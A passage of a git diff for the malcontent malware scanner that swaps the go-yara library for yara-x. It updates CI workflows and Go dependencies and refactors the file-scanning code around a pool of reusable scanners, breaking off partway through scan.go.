diff --git a/.github/workflows/go-tests.yaml b/.github/workflows/go-tests.yaml index e34fab879..6dc1b3b32 100644 --- a/.github/workflows/go-tests.yaml +++ b/.github/workflows/go-tests.yaml @@ -17,25 +17,18 @@ permissions: jobs: test: runs-on: mal-ubuntu-latest-8-core - + container: cgr.dev/chainguard/wolfi-base:latest steps: - - uses: step-security/harden-runner@0080882f6c36860b6ba35c610c98ce87d4e2f26f # v2.10.2 - with: - egress-policy: audit + - name: Install dependencies + run: | + apk update + apk add curl findutils git go nodejs xz yara-x-compat - name: Checkout code uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2 - - uses: actions/setup-go@3041bf56c941b39c61721a86cd11f3bb1338122a # v5.2.0 - with: - go-version-file: go.mod - check-latest: true - - - uses: chainguard-dev/actions/goimports@9d943fc9889a0c0795e3c2bd4b949a9b610ac02e # main - - - name: install dependencies - run: | - sudo apt update && sudo apt install libyara-dev xz-utils -y + - name: Trust repository + run: git config --global --add safe.directory ${{ github.workspace }} - name: Unit tests run: | diff --git a/.github/workflows/style.yaml b/.github/workflows/style.yaml index 9bc078b81..b51d5db7f 100644 --- a/.github/workflows/style.yaml +++ b/.github/workflows/style.yaml @@ -114,29 +114,20 @@ jobs: golangci-lint: name: golangci-lint - runs-on: ubuntu-24.04 - + runs-on: ubuntu-latest + container: cgr.dev/chainguard/wolfi-base:latest steps: - - name: Harden Runner - uses: step-security/harden-runner@0080882f6c36860b6ba35c610c98ce87d4e2f26f # v2.10.2 - with: - egress-policy: audit + - name: Install dependencies + run: | + apk update + apk add curl findutils git go nodejs yara-x-compat - - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2 + - name: Checkout code + uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2 - - name: Set up Go - uses: actions/setup-go@3041bf56c941b39c61721a86cd11f3bb1338122a # v5.2.0 - with: - go-version-file: go.mod - check-latest: true + - name: Trust repository + run: git config --global --add safe.directory ${{ github.workspace }} - - name: install libyara-dev + - name: Run golangci-lint run: | - sudo apt update && sudo apt install libyara-dev -y - - - name: golangci-lint - uses: golangci/golangci-lint-action@971e284b6050e8a5849b72094c50ab08da042db8 # v6.1.1 - with: - version: v1.62.0 - args: --timeout=5m - + make golangci-lint-lint diff --git a/.github/workflows/third-party.yaml b/.github/workflows/third-party.yaml index 9170621ee..9e2f55d63 100644 --- a/.github/workflows/third-party.yaml +++ b/.github/workflows/third-party.yaml @@ -12,6 +12,9 @@ jobs: update: if: ${{ github.repository }} == 'chainguard-dev/malcontent' runs-on: mal-ubuntu-latest-8-core + env: + PKG_CONFIG_PATH: ${{ github.workspace }} + LD_LIBRARY_PATH: ${{ github.workspace }} permissions: contents: write id-token: write @@ -28,9 +31,28 @@ jobs: with: scope: chainguard-dev/malcontent identity: third-party - - name: Install yara and libyara-dev + - name: Clone yara-x + uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2 + with: + repository: VirusTotal/yara-x + path: yara-x + + - name: Setup Rust + uses: dtolnay/rust-toolchain@315e265cd78dad1e1dcf3a5074f6d6c47029d5aa # ??? + with: + toolchain: stable + + - name: Install yara-x-capi run: | - sudo apt update && sudo apt install yara libyara-dev -y + cd ${{ github.workspace }}/yara-x + cargo install cargo-c + cargo cinstall -p yara-x-capi --release --destdir /tmp/yara-x + sudo mkdir -p /usr/local/lib + sudo mkdir -p /usr/local/include + sudo cp /tmp/yara-x/usr/local/include/yara_x.h /usr/local/include/ + sudo cp -a /tmp/yara-x/usr/local/lib/x86_64-linux-gnu/* /usr/local/lib/ + sudo ldconfig -v + cd ${{ github.workspace }} - name: Run make update-third-party run: | make update-third-party diff --git a/cmd/mal/mal.go b/cmd/mal/mal.go index 68988b6c2..bac7a4028 100644 --- a/cmd/mal/mal.go +++ b/cmd/mal/mal.go @@ -239,6 +239,19 @@ func main() { rfs = append(rfs, thirdparty.FS) } + yrs, err := action.CachedRules(ctx, rfs) + if err != nil { + returnCode = ExitInvalidRules + } + + var pool *malcontent.ScannerPool + if mc.ScannerPool == nil { + pool, err = malcontent.NewScannerPool(yrs, runtime.NumCPU()) + if err != nil { + returnCode = ExitInvalidRules + } + } + mc = malcontent.Config{ Concurrency: concurrencyFlag, ExitFirstHit: exitFirstHitFlag, @@ -251,8 +264,9 @@ func main() { OCI: ociFlag, QuantityIncreasesRisk: quantityIncreasesRiskFlag, Renderer: renderer, - RuleFS: rfs, + Rules: yrs, ScanPaths: scanPaths, + ScannerPool: pool, Stats: statsFlag, } diff --git a/go.mod b/go.mod index fdf7cba68..7a7d46cd1 100644 --- a/go.mod +++ b/go.mod @@ -1,8 +1,9 @@ module github.com/chainguard-dev/malcontent -go 1.23.3 +go 1.23.4 require ( + github.com/VirusTotal/yara-x/go v0.12.0 github.com/agext/levenshtein v1.2.3 github.com/cavaliergopher/cpio v1.0.1 github.com/cavaliergopher/rpm v1.2.0 @@ -15,7 +16,7 @@ require ( github.com/gabriel-vasile/mimetype v1.4.7 github.com/google/go-cmp v0.6.0 github.com/google/go-containerregistry v0.20.2 - github.com/hillu/go-yara/v4 v4.3.3 + github.com/klauspost/compress v1.17.11 github.com/olekukonko/tablewriter v0.0.5 github.com/shirou/gopsutil/v4 v4.24.11 github.com/ulikunitz/xz v0.5.12 @@ -30,21 +31,20 @@ require ( github.com/aymanbagabas/go-osc52/v2 v2.0.1 // indirect github.com/bahlo/generic-list-go v0.2.0 // indirect github.com/buger/jsonparser v1.1.1 // indirect - github.com/charmbracelet/x/ansi v0.4.5 // indirect + github.com/charmbracelet/x/ansi v0.6.0 // indirect github.com/charmbracelet/x/term v0.2.1 // indirect - github.com/containerd/stargz-snapshotter/estargz v0.15.1 // indirect - github.com/cpuguy83/go-md2man/v2 v2.0.5 // indirect - github.com/docker/cli v27.3.1+incompatible // indirect + github.com/containerd/stargz-snapshotter/estargz v0.16.3 // indirect + github.com/cpuguy83/go-md2man/v2 v2.0.6 // indirect + github.com/docker/cli v27.4.1+incompatible // indirect github.com/docker/distribution v2.8.3+incompatible // indirect github.com/docker/docker-credential-helpers v0.8.2 // indirect github.com/ebitengine/purego v0.8.1 // indirect github.com/erikgeiser/coninput v0.0.0-20211004153227-1c3628e74d0f // indirect github.com/go-ole/go-ole v1.3.0 // indirect - github.com/klauspost/compress v1.17.11 // indirect github.com/kr/pretty v0.2.1 // indirect github.com/lucasb-eyer/go-colorful v1.2.0 // indirect github.com/lufia/plan9stats v0.0.0-20240909124753-873cd0166683 // indirect - github.com/mailru/easyjson v0.7.7 // indirect + github.com/mailru/easyjson v0.9.0 // indirect github.com/mattn/go-colorable v0.1.13 // indirect github.com/mattn/go-isatty v0.0.20 // indirect github.com/mattn/go-localereader v0.0.1 // indirect @@ -66,8 +66,9 @@ require ( github.com/xrash/smetrics v0.0.0-20240521201337-686a1a2994c1 // indirect github.com/yusufpapurcu/wmi v1.2.4 // indirect golang.org/x/crypto v0.31.0 // indirect - golang.org/x/net v0.31.0 // indirect + golang.org/x/net v0.33.0 // indirect golang.org/x/sys v0.28.0 // indirect golang.org/x/text v0.21.0 // indirect + google.golang.org/protobuf v1.36.0 // indirect pault.ag/go/topsort v0.1.1 // indirect ) diff --git a/go.sum b/go.sum index 02e6fdce9..6e7cf58d3 100644 --- a/go.sum +++ b/go.sum @@ -1,3 +1,5 @@ +github.com/VirusTotal/yara-x/go v0.12.0 h1:nR7MKfNOOqsLXyeJYjgFOQcCjfME9qAoDLiN2Z7/pcg= +github.com/VirusTotal/yara-x/go v0.12.0/go.mod h1:lgXP/nkYX349MVowrtTtU5hzMdCOWQLv3+wKll9+0F8= github.com/agext/levenshtein v1.2.3 h1:YB2fHEn0UJagG8T1rrWknE3ZQzWM06O8AMAatNn7lmo= github.com/agext/levenshtein v1.2.3/go.mod h1:JEDfjyjHDjOF/1e4FlBE/PkbqA9OfWu2ki2W0IB5558= github.com/aymanbagabas/go-osc52/v2 v2.0.1 h1:HwpRHbFMcZLEVr42D4p7XBqjyuxQH5SMiErDT4WkJ2k= @@ -18,19 +20,19 @@ github.com/charmbracelet/bubbletea v1.2.4 h1:KN8aCViA0eps9SCOThb2/XPIlea3ANJLUkv github.com/charmbracelet/bubbletea v1.2.4/go.mod h1:Qr6fVQw+wX7JkWWkVyXYk/ZUQ92a6XNekLXa3rR18MM= github.com/charmbracelet/lipgloss v1.0.0 h1:O7VkGDvqEdGi93X+DeqsQ7PKHDgtQfF8j8/O2qFMQNg= github.com/charmbracelet/lipgloss v1.0.0/go.mod h1:U5fy9Z+C38obMs+T+tJqst9VGzlOYGj4ri9reL3qUlo= -github.com/charmbracelet/x/ansi v0.4.5 h1:LqK4vwBNaXw2AyGIICa5/29Sbdq58GbGdFngSexTdRM= -github.com/charmbracelet/x/ansi v0.4.5/go.mod h1:dk73KoMTT5AX5BsX0KrqhsTqAnhZZoCBjs7dGWp4Ktw= +github.com/charmbracelet/x/ansi v0.6.0 h1:qOznutrb93gx9oMiGf7caF7bqqubh6YIM0SWKyA08pA= +github.com/charmbracelet/x/ansi v0.6.0/go.mod h1:KBUFw1la39nl0dLl10l5ORDAqGXaeurTQmwyyVKse/Q= github.com/charmbracelet/x/term v0.2.1 h1:AQeHeLZ1OqSXhrAWpYUtZyX1T3zVxfpZuEQMIQaGIAQ= github.com/charmbracelet/x/term v0.2.1/go.mod h1:oQ4enTYFV7QN4m0i9mzHrViD7TQKvNEEkHUMCmsxdUg= -github.com/containerd/stargz-snapshotter/estargz v0.15.1 h1:eXJjw9RbkLFgioVaTG+G/ZW/0kEe2oEKCdS/ZxIyoCU= -github.com/containerd/stargz-snapshotter/estargz v0.15.1/go.mod h1:gr2RNwukQ/S9Nv33Lt6UC7xEx58C+LHRdoqbEKjz1Kk= -github.com/cpuguy83/go-md2man/v2 v2.0.5 h1:ZtcqGrnekaHpVLArFSe4HK5DoKx1T0rq2DwVB0alcyc= -github.com/cpuguy83/go-md2man/v2 v2.0.5/go.mod h1:tgQtvFlXSQOSOSIRvRPT7W67SCa46tRHOmNcaadrF8o= +github.com/containerd/stargz-snapshotter/estargz v0.16.3 h1:7evrXtoh1mSbGj/pfRccTampEyKpjpOnS3CyiV1Ebr8= +github.com/containerd/stargz-snapshotter/estargz v0.16.3/go.mod h1:uyr4BfYfOj3G9WBVE8cOlQmXAbPN9VEQpBBeJIuOipU= +github.com/cpuguy83/go-md2man/v2 v2.0.6 h1:XJtiaUW6dEEqVuZiMTn1ldk455QWwEIsMIJlo5vtkx0= +github.com/cpuguy83/go-md2man/v2 v2.0.6/go.mod h1:oOW0eioCTA6cOiMLiUPZOpcVxMig6NIQQ7OS05n1F4g= github.com/davecgh/go-spew v1.1.0/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38= github.com/davecgh/go-spew v1.1.1 h1:vj9j/u1bqnvCEfJOwUhtlOARqs3+rkHYY13jYWTU97c= github.com/davecgh/go-spew v1.1.1/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38= -github.com/docker/cli v27.3.1+incompatible h1:qEGdFBF3Xu6SCvCYhc7CzaQTlBmqDuzxPDpigSyeKQQ= -github.com/docker/cli v27.3.1+incompatible/go.mod h1:JLrzqnKDaYBop7H2jaqPtU4hHvMKP+vjCwu2uszcLI8= +github.com/docker/cli v27.4.1+incompatible h1:VzPiUlRJ/xh+otB75gva3r05isHMo5wXDfPRi5/b4hI= +github.com/docker/cli v27.4.1+incompatible/go.mod h1:JLrzqnKDaYBop7H2jaqPtU4hHvMKP+vjCwu2uszcLI8= github.com/docker/distribution v2.8.3+incompatible h1:AtKxIZ36LoNK51+Z6RpzLpddBirtxJnzDrHLEKxTAYk= github.com/docker/distribution v2.8.3+incompatible/go.mod h1:J2gT2udsDAN96Uj4KfcMRqY0/ypR+oyYUYmja8H+y+w= github.com/docker/docker-credential-helpers v0.8.2 h1:bX3YxiGzFP5sOXWc3bTPEXdEaZSeVMrFgOr3T+zrFAo= @@ -52,9 +54,6 @@ github.com/google/go-cmp v0.6.0 h1:ofyhxvXcZhMsU5ulbFiLKl/XBFqE1GSq7atu8tAmTRI= github.com/google/go-cmp v0.6.0/go.mod h1:17dUlkBOakJ0+DkrSSNjCkIjxS6bF9zb3elmeNGIjoY= github.com/google/go-containerregistry v0.20.2 h1:B1wPJ1SN/S7pB+ZAimcciVD+r+yV/l/DSArMxlbwseo= github.com/google/go-containerregistry v0.20.2/go.mod h1:z38EKdKh4h7IP2gSfUUqEvalZBqs6AoLeWfUy34nQC8= -github.com/hillu/go-yara/v4 v4.3.3 h1:O+7iYTZK20fzsXiJyvA0d529RTdnZCrgS6HdE0O7BMg= -github.com/hillu/go-yara/v4 v4.3.3/go.mod h1:AHEs/FXVMQKVVlT6iG9d+q1BRr0gq0WoAWZQaZ0gS7s= -github.com/josharian/intern v1.0.0/go.mod h1:5DoeVV0s6jJacbCEi61lwdGj/aVlrQvzHFFd8Hwg//Y= github.com/klauspost/compress v1.17.11 h1:In6xLpyWOi1+C7tXUUWv2ot1QvBjxevKAaI6IXrJmUc= github.com/klauspost/compress v1.17.11/go.mod h1:pMDklpSncoRMuLFrf1W9Ss9KT+0rH90U12bZKk7uwG0= github.com/kr/pretty v0.2.1 h1:Fmg33tUaq4/8ym9TJN1x7sLJnHVwhP33CNkpYV/7rwI= @@ -66,8 +65,8 @@ github.com/lucasb-eyer/go-colorful v1.2.0 h1:1nnpGOrhyZZuNyfu1QjKiUICQ74+3FNCN69 github.com/lucasb-eyer/go-colorful v1.2.0/go.mod h1:R4dSotOR9KMtayYi1e77YzuveK+i7ruzyGqttikkLy0= github.com/lufia/plan9stats v0.0.0-20240909124753-873cd0166683 h1:7UMa6KCCMjZEMDtTVdcGu0B1GmmC7QJKiCCjyTAWQy0= github.com/lufia/plan9stats v0.0.0-20240909124753-873cd0166683/go.mod h1:ilwx/Dta8jXAgpFYFvSWEMwxmbWXyiUHkd5FwyKhb5k= -github.com/mailru/easyjson v0.7.7 h1:UGYAvKxe3sBsEDzO8ZeWOSlIQfWFlxbzLZe7hwFURr0= -github.com/mailru/easyjson v0.7.7/go.mod h1:xzfreul335JAWq5oZzymOObrkdz5UnU4kGfJJLY9Nlc= +github.com/mailru/easyjson v0.9.0 h1:PrnmzHw7262yW8sTBwxi1PdJA3Iw/EKBa8psRf7d9a4= +github.com/mailru/easyjson v0.9.0/go.mod h1:1+xMtQp2MRNVL/V1bOzuP3aP8VNwRW55fQUto+XFtTU= github.com/mattn/go-colorable v0.1.13 h1:fFA4WZxdEF4tXPZVKMLwD8oUnCTTo08duU7wxecdEvA= github.com/mattn/go-colorable v0.1.13/go.mod h1:7S9/ev0klgBDR4GtXTXX8a3vIGJpMovkB8vQcUbaXHg= github.com/mattn/go-isatty v0.0.16/go.mod h1:kYGgaQfpe5nmfYZH+SKPsOc2e4SrIfOl2e/yFXSvRLM= @@ -129,8 +128,8 @@ github.com/yusufpapurcu/wmi v1.2.4 h1:zFUKzehAFReQwLys1b/iSMl+JQGSCSjtVqQn9bBrPo github.com/yusufpapurcu/wmi v1.2.4/go.mod h1:SBZ9tNy3G9/m5Oi98Zks0QjeHVDvuK0qfxQmPyzfmi0= golang.org/x/crypto v0.31.0 h1:ihbySMvVjLAeSH1IbfcRTkD/iNscyz8rGzjF/E5hV6U= golang.org/x/crypto v0.31.0/go.mod h1:kDsLvtWBEx7MV9tJOj9bnXsPbxwJQ6csT/x4KIN4Ssk= -golang.org/x/net v0.31.0 h1:68CPQngjLL0r2AlUKiSxtQFKvzRVbnzLwMUn5SzcLHo= -golang.org/x/net v0.31.0/go.mod h1:P4fl1q7dY2hnZFxEk4pPSkDHF+QqjitcnDjUQyMM+pM= +golang.org/x/net v0.33.0 h1:74SYHlV8BIgHIFC/LrYkOGIwL19eTYXQ5wc6TBuO36I= +golang.org/x/net v0.33.0/go.mod h1:HXLR5J+9DxmrqMwG9qjGCxZ+zKXxBru04zlTvWlWuN4= golang.org/x/sync v0.10.0 h1:3NQrjDixjgGwUOCaF8w2+VYHv0Ve/vGYSbdkTa98gmQ= golang.org/x/sync v0.10.0/go.mod h1:Czt+wKu1gCyEFDUtn0jG5QVvpJ6rzVqr5aXyt9drQfk= golang.org/x/sys v0.0.0-20190916202348-b4ddaad3f8a3/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= @@ -146,6 +145,8 @@ golang.org/x/term v0.27.0 h1:WP60Sv1nlK1T6SupCHbXzSaN0b9wUmsPoRS9b61A23Q= golang.org/x/term v0.27.0/go.mod h1:iMsnZpn0cago0GOrHO2+Y7u7JPn5AylBrcoWkElMTSM= golang.org/x/text v0.21.0 h1:zyQAAkrwaneQ066sspRyJaG9VNi/YJ1NfzcGB3hZ/qo= golang.org/x/text v0.21.0/go.mod h1:4IBbMaMmOPCJ8SecivzSH54+73PCFmPWxNTLm+vZkEQ= +google.golang.org/protobuf v1.36.0 h1:mjIs9gYtt56AzC4ZaffQuh88TZurBGhIJMBZGSxNerQ= +google.golang.org/protobuf v1.36.0/go.mod h1:9fA7Ob0pmnwhb644+1+CVWFRbNajQ6iRojtC/QF5bRE= gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0= gopkg.in/check.v1 v1.0.0-20201130134442-10cb98267c6c h1:Hei/4ADfdWqJk1ZMxUNpqntNwaWcugrBjAiHlqqRiVk= gopkg.in/check.v1 v1.0.0-20201130134442-10cb98267c6c/go.mod h1:JHkPIbrfpd72SG/EVd6muEfDQjcINNoR0C8j2r3qZ4Q= diff --git a/pkg/action/path.go b/pkg/action/path.go new file mode 100644 index 000000000..19142b96e --- /dev/null +++ b/pkg/action/path.go @@ -0,0 +1,62 @@ +package action + +import ( + "context" + "fmt" + "os" + "path/filepath" + "strings" + + "github.com/chainguard-dev/clog" +) + +// findFilesRecursively returns a list of files found recursively within a path. +func findFilesRecursively(ctx context.Context, rootPath string) ([]string, error) { + logger := clog.FromContext(ctx) + var files []string + + // Follow symlink if provided at the root + root, err := filepath.EvalSymlinks(rootPath) + if err != nil { + // If the target does not exist, log the error but return gracefully + // This is useful when scanning -compat packages + if os.IsNotExist(err) { + logger.Debugf("symlink target does not exist: %s", err.Error()) + return nil, nil + } + // Allow /proc/XXX/exe to be scanned even if symlink is not resolveable + if strings.HasPrefix(rootPath, "/proc/") { + root = rootPath + } else { + return nil, fmt.Errorf("eval %q: %w", rootPath, err) + } + } + + err = filepath.WalkDir(root, + func(path string, info os.DirEntry, err error) error { + if err != nil { + logger.Errorf("error: %s: %s", path, err) + return nil + } + if info.IsDir() || strings.Contains(path, "/.git/") { + return nil + } + + files = append(files, path) + return nil + }) + return files, err +} + +// cleanPath removes the temporary directory prefix from the path. +func cleanPath(path string, prefix string) string { + return strings.TrimPrefix(path, prefix) +} + +// formatPath formats the path for display. +func formatPath(path string) string { + if strings.Contains(path, "\\") { + path = strings.ReplaceAll(path, "\\", "/") + } + return path +} diff --git a/pkg/action/scan.go b/pkg/action/scan.go index 2b29465ba..22e3339c9 100644 --- a/pkg/action/scan.go +++ b/pkg/action/scan.go @@ -23,89 +23,58 @@ import ( "github.com/chainguard-dev/malcontent/pkg/programkind" "github.com/chainguard-dev/malcontent/pkg/render" "github.com/chainguard-dev/malcontent/pkg/report" - - "github.com/hillu/go-yara/v4" "golang.org/x/sync/errgroup" + + yarax "github.com/VirusTotal/yara-x/go" ) +const interactive string = "Interactive" + var ( // compiledRuleCache are a cache of previously compiled rules. - compiledRuleCache *yara.Rules + compiledRuleCache *yarax.Rules // compileOnce ensures that we compile rules only once even across threads. compileOnce sync.Once ErrMatchedCondition = errors.New("matched exit criteria") ) -// findFilesRecursively returns a list of files found recursively within a path. -func findFilesRecursively(ctx context.Context, rootPath string) ([]string, error) { +// scanSinglePath YARA scans a single path and converts it to a fileReport. +func scanSinglePath(ctx context.Context, c malcontent.Config, path string, ruleFS []fs.FS, absPath string, archiveRoot string) (*malcontent.FileReport, error) { logger := clog.FromContext(ctx) - var files []string + logger = logger.With("path", path) - // Follow symlink if provided at the root - root, err := filepath.EvalSymlinks(rootPath) - if err != nil { - // If the target does not exist, log the error but return gracefully - // This is useful when scanning -compat packages - if os.IsNotExist(err) { - logger.Debugf("symlink target does not exist: %s", err.Error()) - return nil, nil - } - // Allow /proc/XXX/exe to be scanned even if symlink is not resolveable - if strings.HasPrefix(rootPath, "/proc/") { - root = rootPath - } else { - return nil, fmt.Errorf("eval %q: %w", rootPath, err) + // For non-refresh scans, c.Rules will be nil + var yrs *yarax.Rules + var err error + if c.Rules == nil { + yrs, err = CachedRules(ctx, ruleFS) + if err != nil { + return nil, fmt.Errorf("rules: %w", err) } + } else { + yrs = c.Rules } - err = filepath.WalkDir(root, - func(path string, info os.DirEntry, err error) error { - if err != nil { - logger.Errorf("error: %s: %s", path, err) - return nil - } - if info.IsDir() || strings.Contains(path, "/.git/") { - return nil - } - - files = append(files, path) - return nil - }) - return files, err -} - -// cleanPath removes the temporary directory prefix from the path. -func cleanPath(path string, prefix string) (string, error) { - pathEval, err := filepath.EvalSymlinks(path) - if err != nil { - return "", err - } - prefixEval, err := filepath.EvalSymlinks(prefix) - if err != nil { - return "", err + var pool *malcontent.ScannerPool + if c.ScannerPool == nil { + pool, err = malcontent.NewScannerPool(yrs, runtime.NumCPU()) + if err != nil { + return nil, fmt.Errorf("failed to create scanner pool: %w", err) + } + c.ScannerPool = pool } - return strings.TrimPrefix(pathEval, prefixEval), nil -} -// formatPath formats the path for display. -func formatPath(path string) string { - if strings.Contains(path, "\\") { - path = strings.ReplaceAll(path, "\\", "/") + var scanner *yarax.Scanner + scanner, err = c.ScannerPool.Get() + if err != nil { + return nil, fmt.Errorf("failed to retrieve scanner: %w", err) } - return path -} - -// scanSinglePath YARA scans a single path and converts it to a fileReport. -func scanSinglePath(ctx context.Context, c malcontent.Config, path string, ruleFS []fs.FS, absPath string, archiveRoot string) (*malcontent.FileReport, error) { - logger := clog.FromContext(ctx) - var mrs yara.MatchRules - logger = logger.With("path", path) + defer c.ScannerPool.Put(scanner) isArchive := archiveRoot != "" - mime := "" kind, err := programkind.File(path) - if err != nil && c.Renderer.Name() != "Interactive" { + if err != nil && c.Renderer.Name() != interactive { logger.Errorf("file type failure: %s: %s", path, err) } if kind != nil { @@ -117,30 +86,18 @@ func scanSinglePath(ctx context.Context, c malcontent.Config, path string, ruleF } logger = logger.With("mime", mime) - f, err := os.Open(path) - if err != nil && c.Renderer.Name() != "Interactive" { + fc, err := os.ReadFile(path) + if err != nil { return nil, err } - defer f.Close() - fd := f.Fd() - // For non-refresh scans, c.Rules will be nil - // For refreshes, the rules _should_ be compiled by the time we get here - var yrs *yara.Rules - if c.Rules == nil { - yrs, err = CachedRules(ctx, ruleFS) - if err != nil { - return nil, fmt.Errorf("rules: %w", err) - } - } else { - yrs = c.Rules - } - if err := yrs.ScanFileDescriptor(fd, 0, 0, &mrs); err != nil { + mrs, err := scanner.Scan(fc) + if err != nil { logger.Debug("skipping", slog.Any("error", err)) return &malcontent.FileReport{Path: path, Error: fmt.Sprintf("scan: %v", err)}, nil } - fr, err := report.Generate(ctx, path, mrs, c, archiveRoot, logger) + fr, err := report.Generate(ctx, path, mrs, c, archiveRoot, logger, fc) if err != nil { return nil, err } @@ -148,13 +105,17 @@ func scanSinglePath(ctx context.Context, c malcontent.Config, path string, ruleF // Clean up the path if scanning an archive var clean string if isArchive { - fr.ArchiveRoot = archiveRoot - fr.FullPath = path - clean, err = cleanPath(path, archiveRoot) + pathAbs, err := filepath.Abs(path) if err != nil { return nil, err } - clean = formatPath(strings.TrimPrefix(clean, archiveRoot)) + archiveRootAbs, err := filepath.Abs(archiveRoot) + if err != nil { + return nil, err + } + fr.ArchiveRoot = archiveRootAbs + fr.FullPath = pathAbs + clean = formatPath(cleanPath(pathAbs, archiveRootAbs)) } // If absPath is provided, use it instead of the path if they are different. @@ -174,13 +135,11 @@ func scanSinglePath(ctx context.Context, c malcontent.Config, path string, ruleF path = report.TrimPrefixes(absPath, c.TrimPrefixes) } } - // Ensure that files within archives with no behaviors are formatted consistently if isArchive { return &malcontent.FileReport{Path: fmt.Sprintf("%s ∴ %s", absPath, clean)}, nil } return &malcontent.FileReport{Path: path}, nil } - return &fr, nil } @@ -246,12 +205,12 @@ func exitIfHitOrMiss(frs *sync.Map, scanPath string, errIfHit bool, errIfMiss bo return nil, nil } -func CachedRules(ctx context.Context, fss []fs.FS) (*yara.Rules, error) { +func CachedRules(ctx context.Context, fss []fs.FS) (*yarax.Rules, error) { if compiledRuleCache != nil { return compiledRuleCache, nil } - var yrs *yara.Rules + var yrs *yarax.Rules var err error compileOnce.Do(func() { yrs, err = compile.Recursive(ctx, fss) @@ -264,234 +223,294 @@ func CachedRules(ctx context.Context, fss []fs.FS) (*yara.Rules, error) { return compiledRuleCache, err } +// matchResult represents the outcome of a match operation. +type matchResult struct { + fr *malcontent.FileReport + err error +} + +// scanPathInfo contains information about the path being scanned. +type scanPathInfo struct { + originalPath string + effectivePath string + ociExtractPath string + imageURI string +} + // recursiveScan recursively YARA scans the configured paths - handling archives and OCI images. -// -//nolint:gocognit,cyclop,nestif // ignoring complexity of 101,38 func recursiveScan(ctx context.Context, c malcontent.Config) (*malcontent.Report, error) { logger := clog.FromContext(ctx) + r := initializeReport(c.IgnoreTags) + matchChan := make(chan matchResult, 1) + var matchOnce sync.Once + + for _, scanPath := range c.ScanPaths { + if err := handleScanPath(ctx, scanPath, c, r, matchChan, &matchOnce, logger); err != nil { + return r, err + } + } + return r, nil +} + +func initializeReport(ignoreTags []string) *malcontent.Report { r := &malcontent.Report{ Files: sync.Map{}, } - if len(c.IgnoreTags) > 0 { - r.Filter = strings.Join(c.IgnoreTags, ",") + if len(ignoreTags) > 0 { + r.Filter = strings.Join(ignoreTags, ",") } + return r +} - // Store the first hit or miss result - type matchResult struct { - fr *malcontent.FileReport - err error +func handleScanPath(ctx context.Context, scanPath string, c malcontent.Config, r *malcontent.Report, matchChan chan matchResult, matchOnce *sync.Once, logger *clog.Logger) error { + if c.Renderer != nil { + c.Renderer.Scanning(ctx, scanPath) } - matchChan := make(chan matchResult, 1) - var matchOnce sync.Once - for _, scanPath := range c.ScanPaths { - if c.Renderer != nil { - c.Renderer.Scanning(ctx, scanPath) - } - imageURI := "" - ociExtractPath := "" - var err error - - if c.OCI { - // store the image URI for later use - imageURI = scanPath - ociExtractPath, err = archive.OCI(ctx, imageURI) - logger.Debug("oci image", slog.Any("scanPath", scanPath), slog.Any("ociExtractPath", ociExtractPath)) - if err != nil { - return nil, fmt.Errorf("failed to prepare OCI image for scanning: %w", err) - } - scanPath = ociExtractPath - } + scanInfo, err := prepareScanPath(ctx, scanPath, c.OCI, logger) + if err != nil { + return fmt.Errorf("failed to prepare scan path: %w", err) + } - paths, err := findFilesRecursively(ctx, scanPath) - if err != nil { - if len(c.ScanPaths) == 1 { - return nil, fmt.Errorf("find: %w", err) - } - // try to scan remaining scan paths - logger.Errorf("find failed: %v", err) - continue - } + if c.OCI && scanInfo.ociExtractPath != "" { + defer cleanupOCIPath(scanInfo.ociExtractPath, logger) + } - maxConcurrency := c.Concurrency - if maxConcurrency < 1 { - maxConcurrency = 1 + paths, err := findFilesRecursively(ctx, scanInfo.effectivePath) + if err != nil { + if len(c.ScanPaths) == 1 { + return fmt.Errorf("find: %w", err) } + logger.Errorf("find failed: %v", err) + return nil + } - // path refers to a real local path, not the requested scanPath - pc := make(chan string, len(paths)) - for _, path := range paths { - pc <- path - } - close(pc) + return processPaths(ctx, paths, scanInfo, c, r, matchChan, matchOnce, logger) +} - handleArchive := func(path string) error { - frs, err := processArchive(ctx, c, c.RuleFS, path, logger) - if err != nil { - logger.Errorf("unable to process %s: %v", path, err) - } +func prepareScanPath(ctx context.Context, scanPath string, isOCI bool, logger *clog.Logger) (scanPathInfo, error) { + info := scanPathInfo{ + originalPath: scanPath, + effectivePath: scanPath, + } - if !c.OCI && (c.ExitFirstHit || c.ExitFirstMiss) { - match, err := exitIfHitOrMiss(frs, path, c.ExitFirstHit, c.ExitFirstMiss) - if err != nil { - matchOnce.Do(func() { - matchChan <- matchResult{fr: match, err: err} - }) - return err - } - } + if !isOCI { + return info, nil + } - if frs != nil { - frs.Range(func(key, value any) bool { - if key == nil || value == nil { - return true - } - if k, ok := key.(string); ok { - if fr, ok := value.(*malcontent.FileReport); ok { - if len(c.TrimPrefixes) > 0 { - k = report.TrimPrefixes(k, c.TrimPrefixes) - } - r.Files.Store(k, fr) - if c.Renderer != nil && r.Diff == nil && fr.RiskScore >= c.MinFileRisk { - if err := c.Renderer.File(ctx, fr); err != nil { - logger.Errorf("render error: %v", err) - } - } - } - } - return true - }) - } - return nil - } + info.imageURI = scanPath + ociPath, err := archive.OCI(ctx, info.imageURI) + if err != nil { + return info, fmt.Errorf("failed to prepare OCI image for scanning: %w", err) + } - handleFile := func(path string) error { - trimPath := "" - if c.OCI { - scanPath = imageURI - trimPath = ociExtractPath - } + info.ociExtractPath = ociPath + info.effectivePath = ociPath + logger.Debug("oci image", slog.Any("scanPath", scanPath), slog.Any("ociExtractPath", ociPath)) - fr, err := processFile(ctx, c, c.RuleFS, path, scanPath, trimPath, logger) - if err != nil { - if len(c.TrimPrefixes) > 0 { - path = report.TrimPrefixes(path, c.TrimPrefixes) - } - r.Files.Store(path, &malcontent.FileReport{}) - return fmt.Errorf("process: %w", err) - } - if fr == nil { - return nil - } + return info, nil +} - if !c.OCI && (c.ExitFirstHit || c.ExitFirstMiss) { - var frMap sync.Map - frMap.Store(path, fr) - 